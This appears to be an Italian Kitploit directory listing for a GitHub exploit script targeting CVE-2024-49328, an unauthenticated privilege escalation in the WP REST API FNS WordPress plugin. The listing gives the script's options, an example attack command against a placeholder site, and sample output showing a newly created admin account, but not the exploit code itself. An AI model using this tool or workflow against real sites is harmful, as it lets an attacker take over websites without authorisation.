Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-49328-exploit | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2024-49328-exploit
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubnxploited/cve-2024-49328-exploit

CVE-2024-49328-exploit

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-49328-exploit

🌟 Descrizione:

Questo script sfrutta una vulnerabilità di escalation dei privilegi nel plugin WP REST API FNS per WordPress. La vulnerabilità interessa tutte le versioni fino alla 1.0.0 inclusa, consentendo a utenti non autenticati di ottenere privilegi di amministratore.

⚙️ Utilizzo

root@kitploit:~


options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site
  -e NEWEMAIL, --Newemail NEWEMAIL New email to register
  -p PASSWORD, --password PASSWORD Password for the new user
                        

Comando di esempio:

root@kitploit:~
python CVE-2024-49328.py -u http://targetsite.com -e [email protected] -p password123

🔍 Dettagli dello sfruttamento

➡️ Esempio di output

root@kitploit:~

Found Stable tag version: 1.0.0
Version 1.0.0 is exploitable.
Exploiting the site... Please wait.
Successfully
Username: [email protected]
Password: nxploit

Installa i pacchetti richiesti

root@kitploit:~
pip install requests

⚠️ Avvertenza

🚨 Avvertenza:

Questo script è solo per scopi educativi. L'uso non autorizzato di questo script su sistemi senza esplicito permesso è illegale e non etico.

Scarica lo strumento
PassoDescrizioneIcona
Passo 1Verifica della versione del plugin.📝
Passo 2Controlla se la versione è sfruttabile (1.0.0 o precedenti).✅
Passo 3Sfrutta la vulnerabilità e registra un nuovo utente admin.🔒
Passo 4Stampa il risultato con le credenziali utente per la verifica.🎉